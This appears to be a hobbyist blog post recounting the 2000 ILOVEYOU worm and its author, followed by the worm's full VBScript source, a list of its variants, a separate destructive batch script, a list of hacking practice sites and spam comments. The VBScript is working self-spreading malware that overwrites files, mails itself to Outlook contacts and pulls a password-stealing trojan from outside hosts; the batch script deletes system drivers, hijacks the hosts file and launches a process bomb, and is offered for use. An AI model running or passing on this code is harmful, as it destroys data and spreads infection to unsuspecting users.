The "ILOVEYOU" virus

About I love You Virus(Worm)
Source: http://en.wikipedia.org/wiki/AMA_Computer_University



In 1999, a student from AMA Computer College Makati named Onel de Guzman submitted a thesis proposal for the creation of a computer program that will hack into computer systems and extract vital information, particularly Internet Service accounts.[5] The proposal was unanimously rejected by the College of Computer Studies academic board. De Guzman was scheduled to complete his studies in 2000 and an academic subject called “THESIS A” was one of his final requirements before graduation. After AMA’s graduation day on May 3, 2000, an email trojan called ILOVEYOU spread all throughout the globe and caused delays in several online transactions. The “ILOVEYOU” virus unleashed a flood of e-mail that hit at least 45 million users in at least 20 countries, according to one estimate. The virus started with “ILOVEYOU” in the subject line, but several variations appeared soon afterward, including one masquerading as an e-mail joke and another as a receipt for a Mother’s Day gift. The virus both replicates itself and steals the user names and passwords of unsuspecting victims. The e-mail replies from angry virus recipients to the creator passed through a U.S. e-mail address, “isp-adm@mail.com“, which then forwarded them to the two Access.Net (Philippine Internet Service Provider) e-mail accounts used by the virus creator – “spyder@super.net.ph” and “mailme@super.net.ph“.[6]

 Onel de Guzman

The virus, according to Guinness World Records, was the most widespread computer virus of all time.[citation needed] The virus was traced to an apartment room in downtown Manila. The tenant was Onel de Guzman. Guzman was invited by the Philippines’ National Bureau of Investigation for questioning. De Guzman, in an interview, admitted spreading the virus “by accident”.[7]. In reaction to the news, AMA expelled de Guzman from AMA Makati and considered him as “drop-out” for life. The NBI charged De Guzman for violation of Republic Act 8484 or the Access Devices Regulation Act on 1998.[8] But due to lack of sufficiency the Philippine Department of Justice dropped the charges as there was no clear laws regulating the World Wide Web. Due to this incident, June 14, 2000, Republic Act 8792 known as Philippine Electronic Commerce Act of 2000 was signed.

ILOVEYOU Worm

The ILOVEYOU worm was first reported in Hong Kong on 4 May 2000 and spread westward on that day. The ILOVEYOU worm affected computers at more than half of the companies in the USA and more than 105 mail servers in Europe. Internal e-mail systems at both the U.S. Senate and Britain's House of Commons were shut down. It was estimated that the ILOVEYOU worm did more damage than any other malicious program in the history of computing: approximately US$ 9 × 109. On 4 May 2000, MessageLabs filtered ILOVEYOU from one in every 28 e-mails, the all-time highest daily infection rate seen by MessageLabs.



The ILOVEYOU incident was commonly reported as a virus in the news media, but it was actually a worm, because this malicious program did not infect other programs. I call this worm by the subject line of e-mail that propagated this worm. Norton Anti-Virus calls it VBS.Loveletter.A.



The ILOVEYOU worm arrived at the victim's computer in the form of e-mail with the ILOVEYOU subject line and an attachment. The e-mail itself was innocuous, but when the user clicked on the attachment to read the alleged love letter, LOVE-LETTER-FOR-YOU.TXT.VBS, the attachment was a Visual Basic program that performed a horrible sequence of bad things:

   1.

      deletion of files from victim's hard disk
      The worm overwrote files from the victims' hard disk drive,      specifically targeting files with extensions:
          * *.JPG, *.GIF, and *.WAV, amongst many others (i.e., files containing audio/visual data),
          * *.CSS (i.e., cascading style sheets called by HTML 4.0 documents).
          * some later versions deleted *.COM or *.EXE files,          which prevented the computer from starting when rebooted.
          * some later versions deleted *.INI files.
      The worm overwrote a copy of itself to a      file with the name of the original file, appending the extension *.VBS,      so the total number of files on the victim's hard disk would be      unchanged and the damage more difficult to immediately detect.      Further, if a victim clicked on one of these files, the ILOVEYOU worm      would be activated again on that one victim.

      
      By overwriting files, instead of merely deleting files, the worm      made it much more difficult (perhaps impossible) to recover the original      file on the victim's hard drive.  For example, if the worm had merely      deleted files, then the victim could restore the files from the      Recycle Bin or Trash Can.

      
      In addition, the worm marked files of type *.MP3 as hidden, so      they would no longer appear in directory listings, then copied the worm      to new files *.MP3.VBS.

      
   2.

      password theft
      The attachment LOVE-LETTER-FOR-YOU.TXT.VBS     automatically set the Microsoft Internet Explorer start page to a URL     at a web server in the Philippines, which would download     WIN-BUGSFIX.EXE to the victim's machine.

      
      The worm then set the victim's machine to run WIN-BUGSFIX.EXE     the next time the victim's machine was booted.

      
      WIN-BUGSFIX.EXE was a Trojan Horse program that collected     usernames and passwords from the victim's hard drive and e-mailed     them to an address in the Philippines, mailme@super.net.ph.     (That was a really stupid feature, since law enforcement agents,     within 12 hours of the initial release of the worm,     identified the person who owned that e-mail address.)     Furthermore, there was a copyright notice in the Trojan Horse's code!

      
      An Internet Service Provider in Europe alerted the web server in     the Philippines at 08:30 GMT on Thursday, 4 May 2000,     and WIN-BUGSFIX.EXE was removed from the website,     which prevented most of the harm in Europe and the USA from this     password-collecting program.     Later, the web server in the Philippines was overwhelmed     (i.e., a kind of a denial of service attack) with requests from the     worm for WIN-BUGSFIX.EXE.

      
      This Trojan Horse program had been previously submitted as a thesis proposal     at a computer college in the Philippines.  The proposal was rejected     with handwritten comments "This is illegal." and "We don't produce     burglars."  The student then dropped out of the college without     earning a degree.  A copy of the student's rejected thesis     proposal     is posted at Richard M. Smith's website.

      
   3.

      worm propagates
      The worm transmitted itself using features of the earlier     Melissa program: scanning the address book in Microsoft Outlook,     and then transmitted a copy of the ILOVEYOU e-mail to all of those     e-mail addresses.  This method of transmission rapidly disseminated     the worm to millions of victims.     In comparison, Melissa sent copies to only the first     50 entries in the Microsoft Outlook address book, while ILOVEYOU sent     copies to every address in the that victims' book.

      
      The worm also sent copies to other people on the same Internet Relay     Chat channel that the victim was using. Hmmm I wonder where is Onel de Guzman now.. :))
Philippine authorities filed theft and other charges against de Guzman, but dropped them because of insufficient evidence; de Guzman says he no longer hacks, but he still practices 'cracking,' which he describes as gaining unauthorized access to password...

I Love You Virus Source Code
 rem  barok -loveletter(vbe) <i hate go to school>
 rem by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines
 On Error Resume Next
 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
 eq=""
 ctr=0
 Set fso = CreateObject("Scripting.FileSystemObject")
 set file = fso.OpenTextFile(WScript.ScriptFullname,1)
 vbscopy=file.ReadAll
 main()
 sub main()
 On Error Resume Next
 dim wscr,rr
 set wscr=CreateObject("WScript.Shell")
 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
 if (rr>=1) then
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
 end if
 Set dirwin = fso.GetSpecialFolder(0)
 Set dirsystem = fso.GetSpecialFolder(1)
 Set dirtemp = fso.GetSpecialFolder(2)
 Set c = fso.GetFile(WScript.ScriptFullName)
 c.Copy(dirsystem&"\MSKernel32.vbs")
 c.Copy(dirwin&"\Win32DLL.vbs")
 c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
 regruns()
 html()
 spreadtoemail()
 listadriv()
 end sub
 sub regruns()
 On Error Resume Next
 Dim num,downread
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs"
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs"
 downread=""
 downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
 if (downread="") then
 downread="c:\"
 end if
 if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
 Randomize
 num = Int((4 * Rnd) + 1)
 if num = 1 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
 hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
 elseif num = 2 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
 erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
 elseif num = 3 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
 QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
 elseif num = 4 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
 GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe"
 end if
 end if
 if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe"
 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
 Explorer\Main\Start Page","about:blank"
 end if
 end sub
 sub listadriv
 On Error Resume Next
 Dim d,dc,s
 Set dc = fso.Drives
 For Each d in dc
 If d.DriveType = 2 or d.DriveType=3 Then
 folderlist(d.path&"\")
 end if
 Next
 listadriv = s
 end sub
 sub infectfiles(folderspec)
 On Error Resume Next
 dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
 set f = fso.GetFolder(folderspec)
 set fc = f.Files
 for each f1 in fc
 ext=fso.GetExtensionName(f1.path)
 ext=lcase(ext)
 s=lcase(f1.name)
 if (ext="vbs") or (ext="vbe") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 bname=fso.GetBaseName(f1.path)
 set cop=fso.GetFile(f1.path)
 cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
 elseif(ext="jpg") or (ext="jpeg") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 set cop=fso.GetFile(f1.path)
 cop.copy(f1.path&".vbs")
 fso.DeleteFile(f1.path)
 elseif(ext="mp3") or (ext="mp2") then
 set mp3=fso.CreateTextFile(f1.path&".vbs")
 mp3.write vbscopy
 mp3.close
 set att=fso.GetFile(f1.path)
 att.attributes=att.attributes+2
 end if
 if (eq<>folderspec) then
 if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
 set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
 scriptini.WriteLine ";mIRC Script"
 scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
 scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"
 scriptini.WriteLine ";"
 scriptini.WriteLine ";Khaled Mardam-Bey"
 scriptini.WriteLine ";http://www.mirc.com"
 scriptini.WriteLine ";"
 scriptini.WriteLine "n0=on 1:JOIN:#:{"
 scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick
 "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
 scriptini.WriteLine "n3=}"
 scriptini.close
 eq=folderspec
 end if
 end if
 next
 end sub
 sub folderlist(folderspec)
 On Error Resume Next
 dim f,f1,sf
 set f = fso.GetFolder(folderspec)
 set sf = f.SubFolders
 for each f1 in sf
 infectfiles(f1.path)
 folderlist(f1.path)
 next
 end sub
 sub regcreate(regkey,regvalue)
 Set regedit = CreateObject("WScript.Shell")
 regedit.RegWrite regkey,regvalue
 end sub
 function regget(value)
 Set regedit = CreateObject("WScript.Shell")
 regget=regedit.RegRead(value)
 end function
 function fileexist(filespec)
 On Error Resume Next
 dim msg
 if (fso.FileExists(filespec)) Then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 function folderexist(folderspec)
 On Error Resume Next
 dim msg
 if (fso.GetFolderExists(folderspec)) then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 sub spreadtoemail()
 On Error Resume Next
 dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
 set regedit=CreateObject("WScript.Shell")
 set out=WScript.CreateObject("Outlook.Application")
 set mapi=out.GetNameSpace("MAPI")
 for ctrlists=1 to mapi.AddressLists.Count
 set a=mapi.AddressLists(ctrlists)
 x=1
 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
 regv=1
 end if
 if (int(a.AddressEntries.Count)>int(regv)) then
 for ctrentries=1 to a.AddressEntries.Count
 malead=a.AddressEntries(x)
 regad=""
 regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead )
 if (regad="") then
 set male=out.CreateItem(0)
 male.Recipients.Add(malead)
 male.Subject = "ILOVEYOU"
 male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
 male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
 x=x+1
 next
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
 next
 Set out=Nothing
 Set mapi=Nothing
 end sub
 sub html
 On Error Resume Next
 dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
 LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
 @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@
 CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
 "<?-?HEAD><BODY
 ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
 HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
 "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
 BGPROPERTIES=@-@fixed@-@
 BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
 "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
 Enable ActiveX<?-?p>"&vbcrlf& _
 "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
 BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _
 "<?-?BODY><?-?HTML>"&vbcrlf& _
 "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
 "if (window.screen){var wi=screen.availWidth;var
 hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _
 "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"&vbcrlf& _
 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
 "on error resume next"&vbcrlf& _
 "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _
 "code="
 dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
 "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
 wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
 "wri.write code4"&vbcrlf& _
 "wri.close"&vbcrlf& _
 "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _
 "aw=0"&vbcrlf& _
 "end if"&vbcrlf& _
 "if (aw=1) then"&vbcrlf& _
 "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _
 "end if"&vbcrlf& _
 "end if"&vbcrlf& _
 "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
 "regedit.RegWrite
 @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
 -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"
 dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
 dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
 dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
 dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
 dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
 dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
 set fso=CreateObject("Scripting.FileSystemObject")
 set c=fso.OpenTextFile(WScript.ScriptFullName,1)
 lines=Split(c.ReadAll,vbcrlf)
 l1=ubound(lines)
 for n=0 to ubound(lines)
 lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
 lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
 lines(n)=chr(34)+lines(n)+chr(34)
 else
 lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
 next
 set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
 set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
 d.write join(lines,vbcrlf)
 d.write vbcrlf
 d.write dt6
 d.close
 end sub

LOVE BUG VARIANTS

Variant A (Original Virus)
Subject: ILOVEYOU
Message: kindly check the attached LOVELETTER coming from me."
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: The virus begins by copying itself into the Windows directory placing Win32dll.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs. Once these files have been placed on the hard disk drive the virus will then place it self into the computer registry making the virus initiate on each of the following boots. The virus will also attempt to delete the HideSharePwds, DisablePwdCaching and DisablePwdCaching from the computer registry. Once these modifications have been made to the computer it will then send it self to each of the individuals in the address book with the Subject ILOVEYOU. To complete the destruction the destruction the virus will search out .js, .jse, .css, .wsh, .sct and .hta creating a duplicate of each of the files found with the .vbs extension. Finally it will search and delete all files with the ".jpg" and ".jpeg" (these are the most commonly found image file format on the Internet.) Next the virus will search for ".mp3" and ".mp2" files replacing all files found with ".vbs" extension and hiding the original ".mp3" and ".mp2" files.

Variant B
Subject: Susitikim shi vakara kavos puodukui...
Message: kindly check the attached LOVELETTER coming from me."
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

Variant C
Subject: fwd: Joke
Message: *No Message*
Attachment: VeryFunny.vbs

Variant D
Subject: ILOVEYOU
Message: kindly check the attached LOVELETTER coming from me."
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: Creates registry entries as WIN- -BUGFIX.exe instead of WIN-BUGSFIX.exe.

Variant E
Subject: Mothers Day Order Confirmation
Message: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep  it in a safe place. Thanks Again and Have a Happy Mothers Day!
Attachment: Mothersday.vbs

Variant F
Subject: Dangerous Virus Warning
Message: There is a dangerous virus circulating. Please click attached picture to view it and learn to avoid it.
Attachment: virus_warning.jpg.vbs

Variant G
Subject: Virus Alert!!!
Message: Detailed message containing information about the ILOVEYOU worm.
Attachment: protect.vbs
Special Notes: Virus claims to be from support@symantec.com (which is a well known virus protection software company) this mail however of course is not from Symantec. In addition this variant of the worm will delete all files ending with .com and .bat seriously damaging the computer.

Variant H
Subject: ILOVEYOU
Message: kindly check the attached LOVELETTER coming from me."
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: This virus is exactly like Variant A, except that the beginning comments that give credit to the author of the worm and information about worm have been removed.

Variant I
Subject: Important! Read carefully!!
Message: Check the attached IMPORTANT coming from me!
Attachment: Imporant.TXT.vbs
Special Notes: The beginning of the code has been changed giving credit to another author "BrainStorm / @ElectronicSouls"

Variant J
Subject: Virus Alert!!!
Message: Detailed message containing information about the ILOVEYOU worm. Appears to be same as Variant G.
Attachment: protect.vbs
Special Notes: Variant J of the ILOVEYOU worm appears to be a slightly modified version of Variant G.

Variant K
Subject: How to protect yourself from the ILOVEYOU bug!
Message: Here's the easy way to fix the love virus.
Attachment: Virus-Protection-Instructions.vbs.

Variant L
Subject: I Cant Believe This!!!
Message: I Cant Believe I have Just Received This Hate Email .. Take A Look
Attachment: KillEmAll.TXT.VBS
Special Notes: Replaces GIF & BMP images instead  of JPG & JPEG images, hides WAV & MID instead of MP3 and MP2 and copies KILER.HTM, KILLER2.VBS, KILLER1.VBS to the hard disk drive.

Variant M
Subject: Thank you For Flying with Arab Airlines
Message: Please check if the bill is correct, by opening the attached file.
Attachment: ArabAir.TXT.vbs
Special Notes: Replaces DLL & EXE files instead of JPG & JPEG files. Hides SYS & DLL files instead of MP2 and MP3 files. Copies file onto hard drive no-hate-FOR-YOU.HTM.

Variant N
Subject: Variant Test
Message: This is a Variant to the vbs virus
Attachment: IMPORTANT.TXT.vbs
Special Notes: Copies itself as sndvol32.vbs and IEAKDLL.vbs. Internet Explorer start page changes to http://astalavista.box.sk. Overwrites *.mpg, *.mpeg, *.avi, *.qt, *.qtm.

Variant O
Subject: ILOVEYOU
Message: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: The script.ini has been modified slightly.

Variant P
Subject: Yeah, Yeah another time to DEATH...
Message: This is the Killer for VBS.LOVE-LETTER.WORM
Attachment: LOOK.vbs
Special Notes: Sets the Internet Explorer start page to http://www.yahoo.com/Vir-Killer.exe. Overwrites *.ZIP and *.RAR files and hides *.PAS and *.ASM files.

Variant Q
Subject: LOOK!
Message: hehe...check this out.
Attachment: LOOK.vbs
Special Notes: copies itself as MSUser32.vbs and User32DLL.vbs. Overrights *.XLS and *.MDB files. Hides *.EXE and *.LNK files. Creates a LOOK.HTM file.

Variant R
Subject: Bewerbung Kreolina
Message: Sehr geehrte Damen and Herren!
Attachment: BEWERBUNG.TXT.vbs
Special Notes: Sends BEWERBUNG.HTM into connected IRC chat rooms.

Variant S
Subject: ILOVEYOU
Message: Kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: Additional comment lines have been added into the virus.

Variant T
Subject: Recent Virus Attacks-Fix
Message: Attached is a copy of the script that will reverse the effects of the LOVE-LETTER-TO-YOU.TXT.vbs as well as the FW:JOKE, Mother's Day and Lithuanian siblings.
Attachment: BAND-AID.DOC.VBS
Special Notes: Sets the Internet Start page to a virus related page. Deletes *.BAT, *.GIF, *.TIF, *.TIFF, *.WAV, *.LNK, *.BAK, *.DOC, *.XLS, *.RTF, *.TXT, *.HTM, *.HTML, *.XML, *.MNY, *.ZIP, *.BMP, *.CAB and *.INF extentions.

Variant U
Subject: UOL.TXT.vbs
Message: O UOL tem um grande presente para voce, e eh exclusivo. Veja o arquivo em anexo. http://www.uol.com.br.
Attachment: UOL.TXT.vbs
Special Notes: Sets home page to http://www.uol.com.br and hides *.EXE, *.COM and *.INI files.

Variant V
Subject: ILOVEYOU
Message: kindly check the attached LOVELETTER coming from me."
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Special Notes: Several comment lines have been modified.

Variant W
Subject: IMPORTANT: Official virus and bug fix
Message: This is an official virus and bug fix. I got it from our system admin. It may take a short while to update your system files after you run the attachment.
Attachment: Bug and virus fix.vbs
Special Notes: Sets Internet Explorer Start Page to a virus related page. Overwrites *.EXE, *.COM, *.DLL, *.SYS, *.PWL, *.TXT.

Variant X
Subject: NEUE antivirus-Liste
Message: Hiermit senden wir Ihnen/Dir eine neue Liste mit LOVE-LETTER-VIRUS Namen, die nicht geoeffnet werden sollten, bitte sofort lesen, danke.
Attachment: antivirus-LISTE.TXT.vbs
Special Notes: Overwrites *.MDB, *.PDF, *.WSH, *.DOT, *.HTA, *.JS, *.DRV and *.INI files. Hides *.XLS and *.DOC files.

Variant Y
Subject: LOOK!
Message: hehe...check this out.
Attachment: LOOK.vbs
Special Notes: Like earlier LOOK various however hides MP3 and MP2 files.

Variant Z
Subject: BUG & VIRUS FIX
Message: I got this from our system admin. Run this to help prevent any recent or future bug & virus attacks. It may take a small while up update your files.
Attachment: MAJOR BUG & VIRUS FIX.vbs
Special Notes: Sets home page as virus related page. Overwrites *.COM, *.DLL, *.EXE, *.TXT, *.BAT and *.SYS files.

Variant "Catolina" or "Postcard" in Italian
Subject: C una cartolina per te! (Here is a postcard for you)
Message: Ciao, un tuo amico ti ha spedito una cartolina virtuale... mooolto particolare! (Hello my friend, this is a virtual post card ... very special)
Attachment: CARTOLINA.VBS
Special Notes: Sets home page as http://www.vije.it an Italian music site.

Variant "BabyPic" for adults only
Subject: My baby pic!!!
Message: Its myanimated baby picture !!
Attachment: MYBABYPIC.EXE
Special Notes: Program written in Visual Basic with an explicit graphic animated image. When opened and viewed the virus copies itself to a local file system and sends e-mail to each MS Outlook user in the recipients' address book. The worm creates a set of files and registers them in the startup section of Windows system registry, enabling execution each time the computer starts.

The virus contains a very dangerous payload that can easily wipe out data on the computer, enable and disable on/off NumLock, CapsLock and ScrollLock keys; send buffer messages ".IM_BESIDES_YOU_" and may send one of various text messages. In addition MyBabyPic also corrupts files with .VBS, .JS, .JSE, .CSS, .WSH, .SCT, .HTA, .PBL, .CPP, .PAS, .C, .H, .JPG, .JPEG, .MP2 and MP3 extensions.

More Destructive bat Virus
Saturday, July 16, 2011 10:59 AM

 //It will cause Blue Screen of Death  , it will block google , facebook and crash windows ;)

//Credit to goes to author of virus"Ketan Singh"



Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul

Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"

COPY %0 %windir%WINSTART.BAT

cd "C:\Windows\System32\Drivers\etc"

echo 127.0.0.1 facebook.com >> "Hosts"

echo 127.0.0.1 www.facebook.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"

echo 127.0.0.1 google.com >> "Hosts"

echo 127.0.0.1 www.google.com >> "Hosts"

 del /f /q %0

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

start "" crash.bat

Sites to practice your hacking skills


Some sites allow u to do legal hacking in their own network ....  where u can try your hacking skills for free and learn too u can become a  ethical hacker from Noob.

I know few sites:-

====================================================

www.hackthissite.org (good for Noobs)

www.hellboundhackers.org (personally recommended)

www.haxme.org (under construction but challenges are still available)

and many more... try Google to search more

====================================================

This sites contains some challenges which can be completed by using hacking skills... Try it out.
Posted by: Jaime
blognizend, Updated at: 5:14 AM
Share this article :

+ comments + 6 comments

Anonymous
June 8, 2013 at 6:05 PM

Good day! I could have sworn I've been to this website before but after browsing through some of the post I realized it's new to
me. Nonetheless, I'm definitely glad I found it and I'll be bookmarking and
checking back often!

my website ... http://tradewindsimages.net/

Anonymous
June 9, 2013 at 7:50 AM

No matter if some one searches for his required thing, so he/she wants to be available that in
detail, therefore that thing is maintained
over here.

Also visit my page hd pvr

Anonymous
June 9, 2013 at 9:10 AM

Right here is the perfect site for everyone who wants to
understand this topic. You know a whole lot its almost tough to argue
with you (not that I personally would want to…HaHa).
You certainly put a brand new spin on a topic that has been discussed for
ages. Great stuff, just great!

My website - http://darthsengalerie.blogspot.com

Anonymous
June 9, 2013 at 9:00 PM

Hmm it seems like your site ate my first comment (it was
super long) so I guess I'll just sum it up what I wrote and say, I'm thoroughly enjoying your
blog. I as well am an aspiring blog writer but I'm still new to everything. Do you have any tips and hints for beginner blog writers? I'd
definitely appreciate it.

Feel free to surf to my page: Yesterdaystractors.Blogspot.Com

Anonymous
June 10, 2013 at 10:56 AM

Shell cameos have a thin concave spine, using the exception of abalone and mommy
of pearl which might be normally flat around the back and somewhat thicker.
There are many that have a heart or even two hearts intertwined with each other, representing the couple has
given their heart to their significant other. For engraving ideas for birthstone and
pre engagement promise rings, you could start with what prompted
the giving of engraved promise rings.

Also visit my web-site homepage

Anonymous
June 11, 2013 at 8:33 PM

Further, initials of the name can be lettered on mini pieces of stones to make
it even more personal. However, when exchanging the ring, with whomever you choose, be sure to
be perfectly clear on the terms and conditions of the promise.
But these colored diamonds were just as large if not larger than many
of the best colorless diamonds like the Star of Africa, Hope Diamond, etc.


Also visit my web page ... website

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. blognizend - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger
Google+ Jaime Lacson